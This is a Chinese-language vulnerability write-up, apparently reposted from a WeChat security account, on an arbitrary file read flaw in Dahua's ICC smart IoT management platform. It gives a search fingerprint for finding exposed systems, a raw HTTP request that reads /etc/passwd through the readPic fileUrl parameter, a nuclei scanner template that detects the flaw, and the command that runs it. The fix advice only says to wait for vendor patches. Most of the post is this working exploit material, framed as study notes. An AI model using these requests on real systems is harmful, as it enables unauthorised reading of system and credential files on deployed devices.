免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
大华ICC readpic任意文件读取漏洞
02
—
漏洞影响
大华ICC智能物联综合管理平台
03
—
漏洞描述
2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。
04
—
body="*客户端会小于800*"
05
—
漏洞复现
poc如下
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
证明存在漏洞
06
—
nuclei poc
id: dahua-icc-readpic-anyfileread
info:
name: 大华ICC readpic任意文件读取漏洞
author: fgz
severity: high
description: |
2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。
tags: 2023,dahua,fileread
metadata:
2 :
body="*客户端会小于800*" :
verified: true
http:
method: GET
path:
"{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd"
matchers:
type: regex
part: body
regex:
"root:.*?:[0-9]*:[0-9]*:"
运行POC
.nuclei.exe -t mypoc/大华/dahua-icc-readpic-anyfileread.yaml -u https192.168.86.128:8443
07
—
修复建议
关注官方安全中心补丁发布信息。
原文始发于微信公众号(AI与网安):【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论